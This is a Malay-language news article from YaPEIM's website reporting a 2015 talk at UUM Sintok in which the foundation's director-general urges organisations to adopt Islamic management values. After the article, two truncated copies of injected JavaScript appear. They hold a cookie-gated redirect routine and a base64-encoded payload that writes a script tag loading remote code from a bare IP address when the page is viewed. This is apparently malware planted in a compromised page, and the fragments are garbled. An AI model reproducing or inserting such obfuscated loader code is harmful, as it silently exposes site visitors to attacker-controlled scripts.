YaPEIM » TERAPKAN PENGURUSAN ISLAMI DALAM ORGANISASI

Terkini

TERAPKAN PENGURUSAN ISLAMI DALAM ORGANISASI

Ketua Pengarah YaPEIM mengajak masyarakat untuk menerapkan kaedah pengurusan Islami bagi memunculkan jati diri muslim yang sebenar

UUM SINTOK:  Ketua Pengarah Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM), Dato’ Abibullah Samsudin mengajak  masyarakat dan organisasi Islam di negara ini  untuk menerapkan kaedah pengurusan Islami bagi memunculkan jati diri muslim yang sebenar.

Beliau yang juga Ketua Pegawai Eksekutif Kumpulan YaPEIM berkata,  pengamal pengurusan Islami di setiap peringkat sehingga ke peringkat global perlu ditonjolkan supaya menjadi contoh kepada orang ramai.

“Dalam konteks pengurusan sesuatu organisasi kita perlu sedar manusia bukanlah sebuah robot atau aset yang dikerah sepenuhnya untuk menjayakan matlamat organisasi. Setiap insan mempunyai rasa, jiwa dan elemen spiritual.

“Keistimewaan Pengurusan Islami ialah penerimaan dalam mengisi keperluan rohaniah mereka dengan pengisian nilai-nilai akhlak mulia. Komitmen terhadap pengamalan nilai-nilai inilah yang akan membawa kepada kejayaan yang sebenar kepada warga dan institusi,” katanya.

Beliau berkata demikian dalam majlis Perkongsian dan Wacana Ilmu: Pengurusan Sumber-sumber Baru Bagi Pembangunan Islam Di Malaysia di UUM, Sintok, 8 September 2015 lalu.

Dalam majlis yang turut dihadiri Timbalan Naib Canselor Penyelidikan dan Inovasi UUM itu, Prof Dr Noor Azizi Ismail turut diadakan majlis menandatangani Surat Niat di antara Akademi Pengurusan YaPEIM dengan  UUM, dan Penyampaian watikah sebagai penulis karya ilmiah pengurusan Islami.

Abibullah mahukan sumber ilmu dan pengurusan ilmu menjadi elemen penting dalam menentukan kekuatan dan kekayaan sesuatu negara.

“Suatu ketika, para ahli ekonomi menilai sumber-sumber alam sebagai aset terpenting dalam menentukan kekuatan dan kekayaan sesuatu negara.

“Bagaimanapun, sumber-sumber berasaskan ilmu ia tidak akan berkurang apabila dikongsi bersama. Dalam konteks merealisasikan kedua-dua aset ini sudah pasti setiap insan hendaklah dibangunkan agar potensi yang dikurniakan Tuhan diserlahkan sebaik mungkin untuk manfaat umat manusia.” katanya.

Beliau berkata, organisasi yang mempunyai aset insani yang cemerlang akan berperanan untuk menjayakan penjanaan maklumat dan ilmu baru serta melakukan Pengurusan Ilmu dengan baik.

“Daripada sinilah kita akan dapat menjana sumber-sumber baru berasaskan ilmu dengan bantuan teknologi terkini. Dalam hal ini umat Islam hendaklah berazam untuk menerajuinya agar menjana kekuatan dan kekayaan baru,” katanya.

 

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top